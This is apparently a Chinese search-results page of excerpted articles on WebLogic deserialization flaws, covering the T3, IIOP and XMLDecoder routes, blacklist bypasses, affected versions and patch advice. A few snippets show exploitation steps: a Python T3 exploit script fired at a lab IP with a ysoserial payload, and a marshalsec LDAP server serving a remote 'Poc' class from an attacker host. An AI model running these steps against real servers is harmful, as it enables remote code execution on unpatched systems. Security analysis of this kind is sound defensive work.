首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

浅析weblogic序列化漏洞

先引用一下奇安信团队发出的weblogic历史漏洞图,可以发现以反序列化为主,反序列化问题主要来自XMLDecoder和T3协议 image.png T3协议 weblogic t3协议就是weblogic...jdk1.7,weblogic10.3.6.0 用cc链1,3,6都能打。 这个洞可以说是weblogic序列化漏洞的源头了。...这个方法的作用是类的序列化描述符加工成该类的Class对象,很多针对反序列化Gadget的拦截都是通过重写此方法完成的(如通过黑名单来禁止某类反序列化) 贴上一张廖师傅的博客的反序列化攻击时序图: 可以看到反序列化拦截位置除了...CVE-2017-3506&CVE-2017-10271 影响范围 WebLogic 10.3.6.0 WebLogic 12.1.3.0 WebLogic 12.2.1.0 WebLogic 12.2.1.1...WebLogic 12.2.1.2 该漏洞利用weblogic的wls-wsat组件对XML用XMLDecoder进行解析的功能,从而对其传入恶意XML数据造成反序列化攻击。

4.5K11
您找到你想要的搜索结果了吗?
是的
没有找到

CVE-2016-3510:Weblogic序列化

Step 9:在我们的攻击主机中再次执行载荷发现已经无效了(此处的test.ser为通过ysoserial生成的cc1链calc序列化数据文件) python2 weblogic_t3.py 192.168.174.144...,之后再通过调用readObject()方法进行反序列化的数据的读取,这样一来我们就可以反序列化,CVE-2016-0638正是基于这样的思路找到了weblogic.jms.common.StreamMessageImpl...,下面进行详细分析~ 漏洞原理 该漏洞实现反序列化的思路是将反序列化的对象封装进weblogic.corba.utils.MarshalledObject,然后再对MarshalledObject进行序列化...,生成payload字节码,反序列化时MarshalledObject不在WebLogic黑名单中,所以可正常进行反序列化,而在反序列化时MarshalledObject对象再调用readObject时对...MarshalledObject封装的序列化对象再次反序列化,从而逃过了黑名单的检查。

1.8K20

实习记录(三) - WebLogic序列化漏洞

参考 Weblogic-SSRF漏洞复现 Weblogic-反序列化漏洞 漏洞简介 Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。...该漏洞通过T3协议发送恶意的反序列化数据绕过了Weblogic的黑名单,成功反序列化执行任意命令。但该漏洞利用条件较高,官方也归类为需要身份认证。...这个漏洞需要满足以下两个条件: Weblogic开启T3协议 可以获取到SerializedSystemIni.dat文件 影响版本 WebLogic Server 10.3.6.0 WebLogic...运行Poc.java生成poc.ser序列化文件。...修复建议 如果不依赖T3协议进行JVM通信,可禁用T3协议 排查弱口令 升级补丁 参考 WebLogic序列化漏洞(CVE-2019-2890)分析 Weblogic t3反序列化漏洞(CVE-2019

43750

Weblogic序列化历史漏洞全汇总

ac ed 00 05是java序列化内容的特征,漏洞挖掘人员通常对 weblogic 在 7001 端口的 T3 协议进行抓包,发现流量中有 java 反序列化之后数据的 Magic ac ed 00...3.T3协议 WebLogic Server 中的 RMI 通信使用 T3 协议在WebLogic Server和其他 Java程序(包括客户端及其他 WebLogic Server 实例)间传输数据(...由于WebLogic的T3协议和Web协议共用同一个端口,因此只要能访问WebLogic就可利用T3协议实现payload和目标服务器的通信。...4、Weblogic序列化漏洞汇总 Weblogic序列化高危漏洞主要涉及到两个种类: 1、利用xml decoded反序列化进行远程代码执行的漏洞,例如: CVE-2017-10271,CVE-2017...0x07 CNVD-C-2019-48814 概述: WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。

7.2K30

CVE-2020-14644 weblogic iiop反序列化漏洞

CVE-2020-14644 weblogic iiop反序列化漏洞 0x00 weblogic 受影响版本 Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0,...14.1.1.0.0 0x01 环境准备 1、安装weblogic server版本。...0x02 反序列化gadget分析。 这次iiop的关键反序列化类是RemoteConstructor。...transient和static修饰符修饰的成员变量不会参与序列化和反序列化序列化对象和序列化前的对象的全类名和serialVersionUID必须一致在目标类中添加私有的writeObject和readObject...方法可以覆盖默认的序列化和反序列化方法在目标类中添加私有的readResolve可以最终修改反序列化回来的对象,可用于单例模式防止序列化导致生成第二个对象的问题readResolve操作是在readobject

75530

视频 | 从零开始weblogic的反序列化漏洞

本文作者:TtssGkf(Ms08067实验室 SRSP TEAM小组成员) Weblogic序列化漏洞是一个经典的漏洞系列,根源在于Weblogic(及其他很多java服务器应用)在通信过程中传输数据对象...,涉及到序列化和反序列化操作,如果能找到某个类在反序列化过程中能执行某些奇怪的代码,就有可能通过控制这些代码达到RCE的效果。...随着每次补丁的修复,很多Weblogic序列化的思路都被封禁了,但是跟Struts2系列漏洞不同的是,Weblogic漏洞由于涉及的面比较广,所以近几年还是持续有新出漏洞的,这也体现了挖掘出新漏洞的高手们对...目前在做渗透测试时,Weblogic漏洞用来攻击没打补丁的系统会比较有效。...《从零开始weblogic的反序列化漏洞》的分享,带领大家了解weblogic的工作模式,明白漏洞原理,从而掌握调试weblogic序列化漏洞的基本能力。

77010

Weblogic漏洞反序列化(CVE-2019-2725)分析

一、漏洞描述 4月17日,国家信息安全漏洞共享平台(CNVD)公开了Weblogic序列化远程代码执行漏洞(CNVD-C-2019-48814)。...由于WebLogic安装包中默认SDK为1.6版本,在JDK版本<=JDK7u21前提下存在Java原生类反序列化漏洞,使用ysoserial工具生成恶意序列化对象(以计算器程序为例),可在调试器中查看到当前所传入的序列化对象...,最终利用JDK 7u21反序列化漏洞造成了远程代码执行。...from=timeline 升级本地JDK版本 因为Weblogic所采用的是其安装文件中默认1.6版本的JDK文件,属于存在反序列化漏洞的JDK版本,因此升级到JDK7u21以上版本可以避免由于Java...原生类反序列化漏洞造成的远程代码执行。

2.2K30

CVE-2020-14825:Weblogic序列化漏洞复现

月份发布的最新安全补丁中修复了许多安全漏洞,其中黑名单类oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor可造成反序列化漏洞...0x03 影响版本 Oracle WebLogic Server 12.2.1.3.0 Oracle WebLogic Server 12.2.1.4.0 Oracle WebLogic Server...Weblogic下载链接: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html...-cp marshalsec.jar marshalsec.jndi.LDAPRefServer http://192.168.247.128/#Poc 1389 3、运行 payload 文件生成反序列化数据文件...至此,我们可以通过反序列化已经可以调用任意类的无参方法。很容易联想到 CVE-2020-14645 和 fastjson 的利用方式,即通过JdbcRowSetImpl进行 JNDI 注入。

3.1K30

CVE-2018-2628 Weblogic序列化POC重构详解

01 背景 Oracle官方在修补老的Weblogic序列化漏洞时,将已经在互联网上暴露的PoC都加入了黑名单,所以若是绕过他的黑名单限制就依旧可以触发命令执行。...接下来我们简单分析一下本次漏洞的成因,具体的weblogic序列化漏洞原理这里不做具体分析,之后可以分享一次专题。...tcp连接获取RMI registry,加载回来再利用readObject解析,从而造成反序列化远程代码执行。...但是我们也知道,java会将对象序列化成字节码,如何在字节码中找到我们需要修改的ip和端口成为了一个问题。以下是我们的解决方法以及可以提供反序列化漏洞的一些研究方案。...,便于大部分人理解序列化和反序列化的原理,也便于后续漏洞的分析,有问题和想法的同学欢迎和我们共同探讨交流。

1.3K50

WebLogic序列化漏洞(CVE-2018-2893)处置建议

预警编号:NS-2018-0020 2018-07-18 TAG: Oracle WebLogic、CVE-2018-2893、反序列化 危害等级: 高,此漏洞可远程利用,已有攻击脚本且利用简单,攻击者可直接获取系统控制权限...反序列化漏洞(CVE-2018-2628),但由于Weblogic采用黑名单的方式阻止恶意反序列化,仍存在被绕过的可能。...绿盟科技4月份发布的针对Weblogic序列化漏洞(CVE-2018-2628)漏洞的安全防护方案对此漏洞(CVE-2018-2893)仍有效,前期已经按照绿盟科技安全防护方案部署过防护措施的企业,已具有针对此漏洞的防护能力.../cpujul2018-4258247.html SEE MORE → 2影响范围 受影响的版本 Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2...此漏洞影响到Oracle官方现支持的所有版本,若通过防火墙限定了Weblogic服务端口(默认为7001和7002端口)的开放,或者通过限定Weblogic T3服务远程访问,则可缓解此漏洞攻击影响,降低被攻击的风险

1.6K10
领券